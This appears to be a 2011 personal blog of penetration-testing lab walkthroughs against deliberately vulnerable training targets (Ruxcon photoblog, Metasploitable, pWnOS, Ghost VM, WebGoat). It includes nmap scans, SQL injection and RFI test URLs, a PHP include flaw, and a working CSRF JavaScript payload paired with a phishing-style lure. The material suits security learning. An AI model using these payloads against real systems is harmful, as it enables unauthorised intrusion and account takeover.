Pages

Tuesday, November 8, 2011

[Learning] SQL injection - ruxcon training website



Links:
watch the HD video online: http://vimeo.com/f4l13n5now/sqli-ruxcon

Description:

This is Ruxcon WEB Pen Testing Training website (used to practise SQL injection) provided by Louis.

Attacker:
Backtrack 5 R2
IP: 192.168.1.60

Victim:
Photoblog (training website)
IP: 192.168.1.56

vulnerability & exploit:
MySQL based SQL injection

Attacking process:
1, discover the vulnerable services:
use NMAP to probe the opening ports and detect services
nmap -sS -sV -O 192.168.1.56 -v

found the following services:
[1] MySQL database service running on port 3306
[2] HTTP web service running on port 80

2, browes the website and detect the injection point
[1] the potential vulerable URL: http://192.168.1.56/cat.php?id=1

3, test the potential injection point if it has vulerability
[1] numberic based SQL injection test:
try apply the following two URL and check the different response.
URL one "http://192.168.1.56/cat.php?id=1 and 1=2" (response nothing)
vs.
URL two "http://192.168.1.56/cat.php?id=1 and 1=1" (response the normal page)

the test above shows that here is vunerable SQL injection point.

4, exploit the injection point and finally got admin.

Reference:
[1] https://www.owasp.org/index.php/Unrestricted_File_Upload
[2] http://dev.mysql.com/doc/refman/5.0/en/tables-table.html
[3] http://hungred.com/useful-information/secure-file-upload-check-list-php/
[4] http://soroush.secproject.com/blog/2010/03/improve-file-uploaders%e2%80%99-protections-rev-1-0/

Saturday, October 29, 2011

[Learning] Metasploitable - Distcc



Links:
watch the HD video online: http://vimeo.com/f4l13n5now/distcc

Description:
"Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql."                                                                                     -- metasploit team

Attacker:
Backtrack 5 R2
IP: 10.10.10.128/24

Victim:
metasploitable
IP: 10.10.10.129/24

vulnerability & exploit:
1, DistCC Daemon Command Execution
2, Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit

Attacking process:
1, discover the vulnerable services:
use NMAP to probe the opening ports and services
nmap -sS -sV -p0-65535 -O 10.10.10.129 -v

found the following services:
[1] distccd service running on port 3632
[2] Debian openSSH running on port 22

2, exploit vulnerable services:
[1] exploit distccd service to get in the victim server with limited privilege
[2] grep SSH key file information
[3] exploit Debian OpenSSH service to get into the victim server as root privilege

Reference:
[1] Metasploitable download link
[2] Tutorial on g0tmi1k's Blog
[3] Metasploitable official website

Sunday, October 23, 2011

[Update] pWnOS v1

Two more vulnerabilities:

1, There is another vulnerability can be used to get root privilege locally, here is the exploit:

Linux Kernel 2.4/2.6 sock_sendpage() Local Root Exploit [3]

2, an RFI vulnerability was found at "/index1.php", the vulnerable URL is:
http://192.168.1.107/index1.php?connect=/etc/password

The bug in index1.php:
...
if($_GET['connect'] != 'true'){
    include($_GET['connect']);        //Here user's input just be used directly
}
...

Saturday, October 22, 2011

[Learning] pWnOS v1



Links:
watch the HD video online: http://vimeo.com/30946182


Description:
 "pWnOS focuses more on exploitation. All of the exploits are found from milw0rm.com so you won't have to scour the Internet for some obscure exploit. There are a couple different paths to root...so if you get one you can keep working to figure out the other."
                                                                                                                                                  -- bond00

Attacker:
Backtrack 5 R2 [VM]
IP: 192.168.1.108

Victim:
pWnOS v1 [VM]
IP: 192.168.1.110


Vulnerability & Exploit:
1, Webmin < 1.290 / Usermin < 1.220 Arbitrary File Disclosure Exploit
2, Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit
3, Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit

Attacking process:
1, discover the vulnerable services:use NMAP to probe the opening ports and services
nmap -sS -sV -O -A 192.168.1.110 -v
found the following services:
[1] webmin httpd       open on port 10000
[2] Debian openSSH     open on port 22

2, exploit vulnerable services:
[1] exploit webmin service to get password file "/etc/shadow", then found the users:
vmware
obama
osama
yomama
[2] exploit webmin service to get openSSH key files default path: "/home/$USER/.ssh/authorized_keys" (replace $USER with vmware, obama, osama and yomama)
[3] exploit Debian OpenSSH service to get into the victime server
[4] use vmsplice Local Root Exploit to get the root priviledge


Reference:
[1] pWnOS download link (http://0dayclub.com/files/pWnOS%20v1.0.zip)
[2] g0tmi1k's Blog (http://g0tmi1k.blogspot.com/2010/04/video-pwnos.html)
[3] pWnOS forum (http://forums.heorot.net/viewforum.php?f=21)


Monday, September 5, 2011

Play with CSRF

Cross-Site Request Forgery (CSRF/XSRF)

A kind of Injection vulnerability. Used by hacker to exploit the trust that a site has for the authorized user.
More information please check the reference.

Victim:  Ghost VM (XSS & CSRF), admin user on Ghost server
Attacker:  test user on Ghost server

Attacking process:
1, Log in Gost server as admin user
2, submit "<script>alert(1)</script>" to check if there is XSS vulnerability. Of course it has...

3, use WEB Proxy (such as Burp) to check and analyze how the web application is working...
here, we submit test string "abc" and submit.
Burp capture the first request:

Burp capture the second request:

Now we understand how it works:
There are two requests sent to server. So we need to send two requests when write the attacking script.

we construct the malicious java script:

<script>
function test()
{
  var pd="vuln=<h1>Hacked%20by%20F4l13n5n0w&user=admin";
  var xmlhttp=new XMLHttpRequest();
  xmlhttp.onreadystatechange=function() {
    var xmlhttp2=new XMLHttpRequest();
    xmlhttp2.open("GET", "/ghost/iframe.php?page=form.php", true);
    xmlhttp2.send();
  };
  xmlhttp.open("POST", "/ghost/blogView.php", true);
  xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  xmlhttp.send(pd);
}
</script>
Hi admin, Here is a problem. Pls <a href="" onclick="test()">check!</a>

Log in the server as test user and submit the attacking code and then we just waiting for admin to click it.

If the Admin was tricked and click the "check" link. He will submit the sentence "Hacked by F4l13n5n0w" to the server underground.

Have done.


Reference:
[1] http://www.cgisecurity.com/csrf-faq.html
[2] https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
[3] http://www.w3schools.com/ajax/ajax_xmlhttprequest_send.asp



Tuesday, August 23, 2011

Play with XPATH Blind Explorer

xpath-blind-explorer v1.0 was released On the BlackHat_US 2011.

This is automated tool to explore the whole XML content through using XPATH Injection Vulnerability.

check the following links to get more information:

Demo video:
https://www.youtube.com/watch?v=IDQAj09fBvI&feature=related

Download:
http://code.google.com/p/xpath-blind-explorer/downloads/list


In the demo video, only GET method with one parameter was presented.

How about POST method with multi-parameters?

Let's use it to attack WebGoat XPATH Injection challenge.

Victim:       WebGoat (XPATH Injection Lesson)
Attacker:   Windows with xpath-blind-explorer v1.0

Attacking process:

1, submit the correct/incorrect Username and Password (e.g Mike/test123) to check the difference between responses.




If the username and password is correct, the server will return user's information otherwise will return nothing.
So here we use "468100" as the "true" condition keyword.


2, check source code to find out form's request URL and parameters' name
using firebug, we got the request URL is

http://192.168.235.134/WebGoat/attack?Screen=83&menu=1200

The parameter's name:

Username and Password and SUBMIT


3, Configure XPath Blind Explorer as follow:




Use Burp Proxy (listen at localhost, port 8080) to check how the request was created

Add Session cookie in order to pass the authentication with WebGoat server


4, Now we test condition

test "true" condition:

Let's see the request captured by Burp proxy.




The injection code "'%20and%20'1'='1" just appended at the end of all of parameters (which are URL encoded), That means XPath Blind Explorer treat multi-parameter as only one parameter(Blue Username is parameter's name and Red part is value which was URL encoded).

So now, we need to solve two problems:

1, The injection code only be appended at the end of parameters. So we need to change the order of parameters. Let's put the injectable parameter at the end, such as:

SUBMIT=Submit&Username=Mike&Password=test123


2, Because XPath Blind Explorer treat all parameters as only one parameter, so the parameters will be URL encoded including parameter link mark "&" (which is encoded to "%26", but should not be encoded). So we need to replace it back to "&".

Here we use Burp Proxy's function "match and replace", configure it as follow.


Here regex "(%26)" was used to match keyword.



Right now everything is done~ Let's launch it.

Waiting for several minutes, now we got the whole XML file~

Reference:
[1] http://penetration-testing.7safe.com/the-art-of-exploiting-lesser-known-injection-flaws-revealed-at-black-hat/
[2] http://www.zytrax.com/tech/web/regex.htm
[3] http://www.addedbytes.com/cheat-sheets/regular-expressions-cheat-sheet/
[4] http://www.regextester.com/